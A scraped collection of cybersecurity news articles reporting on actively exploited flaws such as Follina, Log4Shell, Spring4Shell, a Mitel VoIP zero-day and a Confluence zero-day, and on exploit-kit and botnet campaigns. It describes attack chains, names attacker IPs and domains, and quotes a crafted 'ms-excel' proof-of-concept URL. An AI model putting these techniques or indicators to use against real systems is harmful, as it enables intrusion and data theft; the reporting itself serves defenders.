In April 2022, Bitdefender discovered another Rig Exploit Kit campaign distributing the RedLine Stealer trojan by exploiting an Internet Explorer flaw patched by Microsoft last year (CVE-2021-26411).
Exploit 2024 2023 2022 2021 2020
Hackers Exploit Mitel VoIP Zero-Day in Likely Ransomware Attack
25.6.22 Exploit Thehackernews
A suspected ransomware intrusion attempt against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment.
The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown exploit as well as a couple of anti-forensic measures adopted by the actor on the device to erase traces of their actions.
The zero-day exploit in question is tracked as CVE-2022-29499 and was fixed by Mitel in April 2022 by means of a remediation script that it shared with customers. It's rated 9.8 out of 10 for severity on the CVSS vulnerability scoring system, making it a critical shortcoming.
"A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the context of the Service Appliance," the company noted in an advisory.
The exploit entailed two HTTP GET requests — which are used to retrieve a specific resource from a server — to trigger remote code execution by fetching rogue commands from the attacker-controlled infrastructure.
In the incident investigated by CrowdStrike, the attacker is said to have used the exploit to create a reverse shell, utilizing it to launch a web shell ("pdf_import.php") on the VoIP appliance and download the open source Chisel proxy tool.
The binary was then executed, but only after renaming it to "memdump" in an attempt to fly under the radar and use the utility as a "reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device." But subsequent detection of the activity halted their progress and prevented them from moving laterally across the network.
The disclosure arrives less than two weeks after German penetration testing firm SySS revealed two flaws in Mitel 6800/6900 desk phones (CVE-2022-29854 and CVE-2022-29855) that, if successfully exploited, could have allowed an attacker to gain root privileges on the devices.
"Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant," CrowdStrike researcher Patrick Bennett said.
"Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via 'one hop' from the compromised device."
Update: According to security researcher Kevin Beaumont, there are nearly 21,500 publicly accessible Mitel devices online, with the majority located in the U.S., followed by the U.K., Canada, France, and Australia.
Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data
24.6.22 Exploit Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.
"Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and [Unified Access Gateway] servers," the agencies said. "As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command-and-control (C2)."
In one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.
Log4Shell, tracked as CVE-2021-44228 (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that's used by a wide range of consumers and enterprise services, websites, applications, and other products.
Successful exploitation of the flaw could enable an attacker to send a specially-crafted command to an affected system, enabling the actors to execute malicious code and seize control of the target.
Based on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed "hmsvc.exe" that's equipped with capabilities to log keystrokes and deploy additional malware.
"The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network," the agencies noted, adding it also offers a "graphical user interface (GUI) access over a target Windows system's desktop."
The PowerShell scripts, observed in the production environment of a second organization, facilitated lateral movement, enabling the APT actors to implant loader malware containing executables that include the ability to remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute next-stage binaries.
Furthermore, the adversarial collective leveraged CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager that came to light in April 2022, to implant the Dingo J-spy web shell.
Ongoing Log4Shell-related activity even after more than six months suggests that the flaw is of high interest to attackers, including state-sponsored advanced persistent threat (APT) actors, who have opportunistically targeted unpatched servers to gain an initial foothold for follow-on activity.
According to cybersecurity company ExtraHop, Log4j vulnerabilities have been subjected to relentless scanning attempts, with financial and healthcare sectors emerging as an outsized market for potential attacks.
"Log4j is here to stay, we will see attackers leveraging it again and again," IBM-owned Randori said in an April 2022 report. "Log4j buried deep into layers and layers of shared third-party code, leading us to the conclusion that we'll see instances of the Log4j vulnerability being exploited in services used by organizations that use a lot of open source."
RIG Exploit Kit Now Infects Victims' PCs With Dridex Instead of Raccoon Stealer
22.6.22 Exploit Thehackernews
The operators behind the Rig Exploit Kit have swapped the Raccoon Stealer malware for the Dridex financial trojan as part of an ongoing campaign that commenced in January 2022.
The switch in modus operandi, spotted by Romanian company Bitdefender, comes in the wake of Raccoon Stealer temporarily closing the project after one of its team members responsible for critical operations passed away in the Russo-Ukrainian war in March 2022.
The Rig Exploit Kit is notable for its abuse of browser exploits to distribute an array of malware. First spotted in 2019, Raccoon Stealer is a credential-stealing trojan that's advertised and sold on underground forums as a malware-as-a-service (MaaS) for $200 a month.
That said, the Raccoon Stealer actors are already working on a second version that's expected to be "rewritten from scratch and optimized." But the void left by the malware's exit is being filled by other information stealers such as RedLine Stealer and Vidar.
Dridex (aka Bugat and Cridex), for its part, has the capability to download additional payloads, infiltrate browsers to steal customer login information entered on banking websites, capture screenshots, and log keystrokes, among others, through different modules that allow its functionality to be extended at will.
In April 2022, Bitdefender discovered another Rig Exploit Kit campaign distributing the RedLine Stealer trojan by exploiting an Internet Explorer flaw patched by Microsoft last year (CVE-2021-26411).
That's not all. Last May, a separate campaign exploited two scripting engine vulnerabilities in unpatched Internet Explorer browsers (CVE-2019-0752 and CVE-2018-8174) to deliver a malware called WastedLoader, so named for its similarities to WasterLocker but lacking the ransomware component.
"This once again demonstrates that threat actors are agile and quick to adapt to change," the cybersecurity firm said. "By design, Rig Exploit Kit allows for rapid substitution of payloads in case of detection or compromise, which helps cyber criminal groups recover from disruption or environmental changes."
State-Backed Hackers Exploit Microsoft 'Follina' Bug to Target Entities in Europe and U.S
6.6.22 Exploit Thehackernews
A suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office "Follina" vulnerability to target government entities in Europe and the U.S.
Enterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is being tracked CVE-2022-30190 (CVSS score: 7.8). No less than 1,000 phishing messages containing a lure document were sent to the targets.
"This campaign masqueraded as a salary increase and utilized an RTF with the exploit payload downloaded from 45.76.53[.]253," the company said in a series of tweets.
The payload, which manifests in the form of a PowerShell script, is Base64-encoded and functions as a downloader to retrieve a second PowerShell script from a remote server named "seller-notification[.]live."
"This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil[tration] to 45.77.156[.]179," the company added.
The phishing campaign has not been linked to a previously known group, but said it was mounted by a nation-state actor based on the specificity of the targeting and the PowerShell payload's wide-ranging reconnaissance capabilities.
The development follows active exploitation attempts by a Chinese threat actor tracked as TA413 to deliver weaponized ZIP archives with malware-rigged Microsoft Word documents.
The Follina vulnerability, which leverages the "ms-msdt:" protocol URI scheme to remotely take control of target devices, remains unpatched, with Microsoft urging customers to disable the protocol to prevent the attack vector.
"Proofpoint continues to see targeted attacks leveraging CVE-2022-30190," Sherrod DeGrippo, vice president of threat research, said in a statement shared with The Hacker News.
"The extensive reconnaissance conducted by the second PowerShell script demonstrates an actor interested in a large variety of software on a target's computer. This, coupled with the tight targeting of European government and local U.S. governments, led us to suspect this campaign has a state aligned nexus."
Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability
3.6.22 Exploit Thehackernews
Atlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.
The Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as CVE-2022-26134.
"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server," it said in an advisory.
"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix." Specifics of the security flaw have been withheld until a software patch is available.
Confluence Server version 7.18.0 is known to have been exploited in the wild, although Confluence Server and Data Center versions 7.4.0 and later are potentially vulnerable.
In the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling Confluence Server and Data Center instances altogether.
Volexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. as part of an incident response investigation.
The attack chain involved leveraging the Atlassian zero-day exploit — a command injection vulnerability — to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.
"Behinder provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike," the researchers said. "At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out."
Subsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including China Chopper and a custom file upload shell to exfiltrate arbitrary files to a remote server.
The development comes less than a year after another critical remote code execution flaw in Atlassian Confluence (CVE-2021-26084, CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.
"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks," Volexity said. "Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities."
Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability
1.6.22 Exploit Thehackernews
An advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new zero-day flaw in Microsoft Office to achieve code execution on affected systems.
"TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique," enterprise security firm Proofpoint said in a tweet.
"Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app."
TA413 is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as Exile RAT and Sepulcher as well as a rogue Firefox browser extension dubbed FriarFox.
The high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the "ms-msdt:" protocol URI scheme to execute arbitrary code.
Specifically, the attack makes it possible for threat actors to circumvent Protected View safeguards for suspicious files by simply changing the document to a Rich Text Format (RTF) file, thereby allowing the injected code to be run without even opening the document via the Preview Pane in Windows File Explorer.
While the bug gained widespread attention last week, evidence points to the active exploitation of the diagnostic tool flaw in real-world attacks targeting Russian users over a month ago on April 12, 2022, when it was disclosed to Microsoft.
The company, however, did not deem it a security issue and closed the vulnerability submission report, citing reasons that the MSDT utility required a passkey provided by a support technician before it can execute payloads.
The vulnerability exists in all currently supported Windows versions and can be exploited via Microsoft Office versions Office 2013 through Office 21 and Office Professional Plus editions.
"This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros," Malwarebytes' Jerome Segura noted.
Although there is no official patch available at this point, Microsoft has recommended disabling the MSDT URL protocol to prevent the attack vector. Additionally, it's been advised to turn off the Preview Pane in File Explorer.
"What makes 'Follina' stand out is that this exploit does not take advantage of Office macros and, therefore, it works even in environments where macros have been disabled entirely," Nikolas Cemerikic of Immersive Labs said.
"All that's required for the exploit to take effect is for a user to open and view the Word document, or to view a preview of the document using the Windows Explorer Preview Pane. Since the latter does not require Word to launch fully, this effectively becomes a zero-click attack."
Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation
31.5.22 Exploit Thehackernews
Microsoft on Monday published guidance for a newly discovered zero-day security flaw in its Office productivity suite that could be exploited to achieve code execution on affected systems.
The weakness, now assigned the identifier CVE-2022-30190, is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, Office 2019, and Office 2021, as well as Professional Plus editions, are impacted.
"To help protect customers, we've published CVE-2022-30190 and additional guidance here," a Microsoft spokesperson told The Hacker News in an emailed statement.
The Follina vulnerability, which came to light late last week, involved a real-world exploit that leveraged the shortcoming in a weaponized Word document to execute arbitrary PowerShell code by making use of the "ms-msdt:" URI scheme. The sample was uploaded to VirusTotal from Belarus.
But first signs of exploitation of the flaw date back to April 12, 2022, when a second sample was uploaded to the malware database. This artifact is believed to have targeted a user in Russia with a malicious Word document ("приглашение на интервью.doc") that masqueraded as an interview invitation with Sputnik Radio.
"A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word," Microsoft said in an advisory for CVE-2022-30190.
"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights."
The tech giant credited crazyman, a member of the Shadow Chaser Group, for reporting the flaw on April 12, coinciding with the discovery of the in-the-wild exploit targeting Russian users, indicating the company had been already aware of the vulnerability.
Indeed, according to screenshots shared by the researcher on Twitter, Microsoft closed the report on April 21, 2022 stating "the issue has been fixed," while also dismissing the flaw as "not a security issue" since it requires a passkey provided by a support technician when starting the diagnostic tool.
Besides releasing detection rules for Microsoft Defender for Endpoint, the Redmond-based company has offered workarounds in its guidance to disable the MSDT URL protocol via a Windows Registry modification.
"If the calling application is a Microsoft Office application, by default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office, both of which prevent the current attack," Microsoft said.
This is not the first time Microsoft Office protocol schemes like "ms-msdt:" have come under the scanner for their potential misuse. Earlier this January, Germany security company SySS disclosed how it's possible to open files directly via specially crafted URLs such as "ms-excel:ofv|u|https://192.168.1.10/poc[.]xls."
EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities
31.5.22 Exploit Thehackernews
A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).
"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices."
First disclosed by Securonix in March and later by Fortinet, Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.
Enemybot, which is capable of carrying out DDoS attacks, draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it's made up of four different components -
A Python module to download dependencies and compile the malware for different OS architectures
The core botnet section
An obfuscation segment designed to encode and decode the malware's strings, and
A command-and-control functionality to receive attack commands and fetch additional payloads
"In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing [a] shell command," the researchers said, pointing to a new "adb_infect" function. ADB refers to Android Debug Bridge, a command-line utility used to communicate with an Android device.
Also incorporated is a new scanner function that's engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.
Besides the Log4Shell vulnerabilities that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access (CVE-2022-22954), and F5 BIG-IP (CVE-2022-1388) as well as weaknesses in WordPress plugins like Video Synchro PDF.
Other weaponized security shortcomings are below -
CVE-2022-22947 (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway
CVE-2021-4039 (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware
CVE-2022-25075 (CVSS score: 9.8) - A command injection vulnerability in TOTOLink A3000RU wireless router
CVE-2021-36356 (CVSS score: 9.8) - A remote code execution vulnerability in KRAMER VIAware
CVE-2021-35064 (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAWare
CVE-2020-7961 (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal
What's more, the botnet's source code has been shared on GitHub, making it widely available to other threat actors. "I assume no responsibility for any damages caused by this program," the project's README file reads. "This is posted under Apache license and is also considered art."
"Keksec's Enemybot appears to be just starting to spread, however due to the authors' rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,'' the researchers said.
"This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread."
Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild
31.5.22 Exploit Thehackernews
Cybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.
The vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document ("05-2022-0438.doc") that was uploaded to VirusTotal from an IP address in Belarus.
"It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code," the researchers noted in a series of tweets last week.
According to security researcher Kevin Beaumont, who dubbed the flaw "Follina," the maldoc leverages Word's remote template feature to fetch an HTML file from a server, which then makes use of the "ms-msdt://" URI scheme to run the malicious payload.
The shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.
MSDT is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.
"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled," Beaumont explained.
"Protected View does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View," the researcher added.
In a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file ("RDF842l.html") that triggers the exploit originated from a now-unreachable domain named "xmlformats[.]com."
"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer," Huntress Labs' John Hammond said. "Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger."
Multiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.
What's more, Richard Warren of NCC Group managed to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.
"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking," Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.
Hackers Exploiting VMware Horizon to Target South Korea with NukeSped Backdoor
20.5.22 Exploit Thehackernews
The North Korea-backed Lazarus Group has been observed leveraging the Log4Shell vulnerability in VMware Horizon servers to deploy the NukeSped (aka Manuscrypt) implant against targets located in its southern counterpart.
"The attacker used the Log4j vulnerability on VMware Horizon products that were not applied with the security patch," AhnLab Security Emergency Response Center (ASEC) said in a new report.
The intrusions are said to have been first discovered in April, although multiple threat actors, including those aligned with China and Iran, have employed the same approach to further their objectives over the past few months.
ukeSped is a backdoor that can perform various malicious activities based on commands received from a remote attacker-controlled domain. Last year, Kaspersky disclosed a spear-phishing campaign aimed at stealing critical data from defense companies using a NukeSped variant called ThreatNeedle.
Some of the key functions of the backdoor range from capturing keystrokes and taking screenshots to accessing the device's webcam and dropping additional payloads such as information stealers.
The stealer malware, a console-based utility, is designed to exfiltrate accounts and passwords saved in web browsers like Google Chrome, Mozilla Firefox, Internet Explorer, Opera, and Naver Whale as well as information about email accounts and recently opened Microsoft Office and Hancom files.
"The attacker collected additional information by using backdoor malware NukeSped to send command line commands," the researchers said. "The collected information can be used later in lateral movement attacks."
Chinese Hackers Caught Exploiting Popular Antivirus Products to Target Telecom Sector
3.5.22 Exploit Thehackernews
A Chinese-aligned cyberespionage group has been observed striking the telecommunication sector in Central Asia with versions of malware such as ShadowPad and PlugX.
Cybersecurity firm SentinelOne tied the intrusions to an actor it tracks under the name "Moshen Dragon," with tactical overlaps between the collective and another threat group referred to as Nomad Panda (aka RedFoxtrot).
"PlugX and ShadowPad have a well-established history of use among Chinese-speaking threat actors primarily for espionage activity," SentinelOne's Joey Chen said. "Those tools have flexible, modular functionality and are compiled via shellcode to easily bypass traditional endpoint protection products."
ShadowPad, labeled a "masterpiece of privately sold malware in Chinese espionage," emerged as a successor to PlugX in 2015, even as variants of the latter have continually popped up as part of different campaigns associated with Chinese threat actors.
Although known to be deployed by the government-sponsored hacking group dubbed Bronze Atlas (aka APT41, Barium, or Winnti) since at least 2017, an ever-increasing number of other China-linked threat actors have joined the fray.
Earlier this year, Secureworks attributed distinct ShadowPad activity clusters to Chinese nation-state groups that operate in alignment with the Chinese Ministry of State Security (MSS) civilian intelligence agency and the People's Liberation Army (PLA).
The latest findings from SentinelOne dovetails with a previous report from Trellix in late March that revealed a RedFoxtrot attack campaign targeting telecom and defense sectors in South Asia with a new variant of PlugX malware named Talisman.
Moshen Dragon's TTPs involve the abuse of legitimate antivirus software belonging to BitDefender, Kaspersky, McAfee, Symantec, and Trend Micro to sideload ShadowPad and Talisman on compromised systems by means of a technique called DLL search order hijacking.
In the subsequent step, the hijacked DLL is used to decrypt and load the final ShadowPad or PlugX payload that resides in the same folder as that of the antivirus executable. Persistence is achieved by either creating a scheduled task or a service.
The hijacking of security products notwithstanding, other tactics adopted by the group include the use of known hacking tools and red team scripts to facilitate credential theft, lateral movement and data exfiltration. The initial access vector remains unclear as yet.
"Once the attackers have established a foothold in an organization, they proceed with lateral movement by leveraging Impacket within the network, placing a passive backdoor into the victim environment, harvesting as many credentials as possible to insure unlimited access, and focusing on data exfiltration," Chen said.
New RIG Exploit Kit Campaign Infecting Victims' PCs with RedLine Stealer
29.4.22 Exploit Thehackernews
A new campaign leveraging an exploit kit has been observed abusing an Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan.
"When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server," Bitdefender said in a new report shared with The Hacker News.
Most of the infections are located in Brazil and Germany, followed by the U.S., Egypt, Canada, China, and Poland, among others.
Exploit kits or exploit packs are comprehensive tools that contain a collection of exploits designed to take advantage of vulnerabilities in commonly-used software by scanning infected systems for different kinds of flaws and deploying additional malware.
The primary infection method used by attackers to distribute exploit kits, in this case the Rig Exploit Kit, is through compromised websites that, when visited, drops the exploit code to ultimately send the RedLine Stealer payload to carry out follow-on attacks.
The flaw in question is CVE-2021-26411 (CVSS score: 8.8), a memory corruption vulnerability impacting Internet Explorer that has been previously weaponized by North Korea-linked threat actors. It was addressed by Microsoft as part of its Patch Tuesday updates for March 2021.
"The RedLine Stealer sample delivered by RIG EK comes packed in multiple encryption layers [...] to avoid detection," the Romanian cybersecurity firm noted, with the unpacking of the malware progressing through as many as six stages.
RedLine Stealer, an information-stealing malware sold on underground forums, comes with features to exfiltrate passwords, cookies and credit card data saved in browsers, as well as crypto wallets, chat logs, VPN login credentials and text from files as per commands received from a remote server.
This is far from the only campaign that involves the distribution of RedLine Stealer. In February 2022, HP detailed a social engineering attack using fake Windows 11 upgrade installers to trick Windows 10 users into downloading and executing the malware.
Iranian Hackers Exploiting VMware RCE Bug to Deploy 'Core Impact' Backdoor
26.4.22 Exploit Thehackernews
An Iranian-linked threat actor known as Rocket Kitten has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems.
Tracked as CVE-2022-22954 (CVSS score: 9.8), the critical issue concerns a case of remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access and Identity Manager.
While the issue was patched by the virtualization services provider on April 6, 2022, the company cautioned users of confirmed exploitation of the flaw occurring in the wild a week later.
"A malicious actor exploiting this RCE vulnerability potentially gains an unlimited attack surface," researchers from Morphisec Labs said in a new report. "This means highest privileged access into any components of the virtualized host and guest environment."
Attack chains exploiting the flaw involve the distribution of a PowerShell-based stager, which is then used to download a next-stage payload called PowerTrash Loader that, in turn, injects the penetration testing tool, Core Impact, into memory for follow-on activities.
"The widespread use of VMWare identity access management combined with the unfettered remote access this attack provides is a recipe for devastating breaches across industries," the researchers said.
"VMWare customers should also review their VMware architecture to ensure the affected components are not accidentally published on the internet, which dramatically increases the exploitation risks."
Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware
9.4.22 Exploit Thehackernews
The recently disclosed critical Spring4Shell vulnerability is being actively exploited by threat actors to execute the Mirai botnet malware, particularly in the Singapore region since the start of April 2022.
"The exploitation allows threat actors to download the Mirai sample to the '/tmp' folder and execute them after permission change using 'chmod,'" Trend Micro researchers Deep Patel, Nitesh Surana, Ashish Verma said in a report published Friday.
Tracked as CVE-2022-22965 (CVSS score: 9.8), the vulnerability could allow malicious actors to achieve remote code execution in Spring Core applications under non-default circumstances, granting the attackers full control over the compromised devices.
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) earlier this week added the Spring4Shell vulnerability to its Known Exploited Vulnerabilities Catalog based on "evidence of active exploitation."
This is far from the first time the botnet operators have quickly moved to add newly publicized flaws to their exploit toolset. In December 2021, multiple botnets including Mirai and Kinsing were uncovered leveraging the Log4Shell vulnerability to breach susceptible servers on the internet.
Mirai, meaning "future" in Japanese, is the name given to a Linux malware that has continued to target networked smart home devices such as IP cameras and routers and link them together into a network of infected devices known as a botnet.
The IoT botnet, using the herd of hijacked hardware, can be then used to commit further attacks, including large-scale phishing attacks, cryptocurrency mining, click fraud, and distributed denial-of-service (DDoS) attacks.
To make matters worse, the leak of Mirai's source code in October 2016 has given birth to numerous variants such as Okiru, Satori, Masuta, and Reaper, making it an ever-mutating threat.
Earlier this January, cybersecurity firm CrowdStrike noted that malware hitting Linux systems increased by 35% in 2021 compared to 2020, with XOR DDoS, Mirai, and Mozi malware families accounting for more than 22% of Linux-targeted threats observed in the year.
"The primary purpose of these malware families is to compromise vulnerable internet-connected devices, amass them into botnets, and use them to perform distributed denial-of-service (DDoS) attacks," the researchers said.
CISA Warns of Active Exploitation of Critical Spring4Shell Vulnerability
5.4.22 Exploit Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added the recently disclosed remote code execution (RCE) vulnerability affecting the Spring Framework, to its Known Exploited Vulnerabilities Catalog based on "evidence of active exploitation."
The critical severity flaw, assigned the identifier CVE-2022-22965 (CVSS score: 9.8) and dubbed "Spring4Shell", impacts Spring model–view–controller (MVC) and Spring WebFlux applications running on Java Development Kit 9 and later.
"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application," Praetorian researchers Anthony Weems and Dallas Kaman noted last week.
Although exact details of in-the-wild abuse remain unclear, information security company SecurityScorecard said "active scanning for this vulnerability has been observed coming from the usual suspects like Russian and Chinese IP space."
Similar scanning activities have been spotted by Akamai and Palo Alto Networks' Unit42, with the attempts leading to the deployment of a web shell for backdoor access and to execute arbitrary commands on the server with the goal of delivering other malware or spreading within the target network.
According to statistics released by Sonatype, potentially vulnerable versions of the Spring Framework account for 81% of the total downloads from Maven Central repository since the issue came to light on March 31.
Cisco, which is actively investigating its line-up to determine which of them may be impacted by the vulnerability, confirmed that three of its products are affected -
Cisco Crosswork Optimization Engine
Cisco Crosswork Zero Touch Provisioning (ZTP), and
Cisco Edge Intelligence
VMware, for its part, also has deemed three of its products as vulnerable, offering patches and workarounds where applicable -
VMware Tanzu Application Service for VMs
VMware Tanzu Operations Manager, and
VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)
"A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system," VMware said in the advisory.
Also added by CISA to the catalog are two zero-day flaws patched by Apple last week (CVE-2022-22674 and CVE-2022-22675) and a critical shortcoming in D-Link routers (CVE-2021-45382) that has been actively weaponized by the Beastmode Mirai-based DDoS campaign.
Pursuant to the Binding Operational Directive (BOD) issued by CISA in November 2021, Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by April 25, 2022.
Microsoft: Hackers Exploiting New SolarWinds Serv-U Bug Related to Log4j Attacks
21.1.2022 Exploit Thehackernews
Microsoft on Wednesday disclosed details of a new security vulnerability in SolarWinds Serv-U software that it said was being weaponized by threat actors to propagate attacks leveraging the Log4j flaws to compromise targets.
Tracked as CVE-2021-35247 (CVSS score: 5.3), the issue is an "input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation," Microsoft Threat Intelligence Center (MSTIC) said.
The flaw, which was discovered by security researcher Jonathan Bar Or, affects Serv-U versions 15.2.5 and prior, and has been addressed in Serv-U version 15.3.
"The Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized," SolarWinds said in an advisory, adding it "updated the input mechanism to perform additional validation and sanitization."
The IT management software maker also pointed out that "no downstream effect has been detected as the LDAP servers ignored improper characters." It's not immediately clear if the attacks detected by Microsoft were mere attempts to exploit the flaw or if they were ultimately successful.
The development comes as multiple threat actors continue to take advantage of the Log4Shell flaws to mass scan and infiltrate vulnerable networks for deploying backdoors, coin miners, ransomware, and remote shells that grant persistent access for further post-exploitation activity.
Akamai researchers, in an analysis published this week, also found evidence of the flaws being abused to infect and assist in the proliferation of malware used by the Mirai botnet by targeting Zyxel networking devices.
On top of this, a China-based hacking group has been previously observed exploiting a critical security vulnerability affecting SolarWinds Serv-U (CVE-2021-35211) to install malicious programs on the infected machines.
Update: In a statement shared with The Hacker News, SolarWinds pointed out that its Serv-U software wasn't exploited in the Log4j attacks, and that attempts were made to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j flaws.
"The activity Microsoft was referring to in their report was related to a threat actor attempting to login to Serv-U using the Log4j vulnerability but that attempt failed as Serv-U does not utilize Log4j code and the target for authentication LDAP (Microsoft Active Directory) is not susceptible to Log4J attacks," a company spokesperson said.
This directly contradicts Microsoft's original disclosure that attackers were exploiting the previously undisclosed vulnerability in the SolarWinds Serv-U file-sharing software to propagate Log4j attacks. We have reached out to Microsoft for further comment, and we will update the story if we hear back.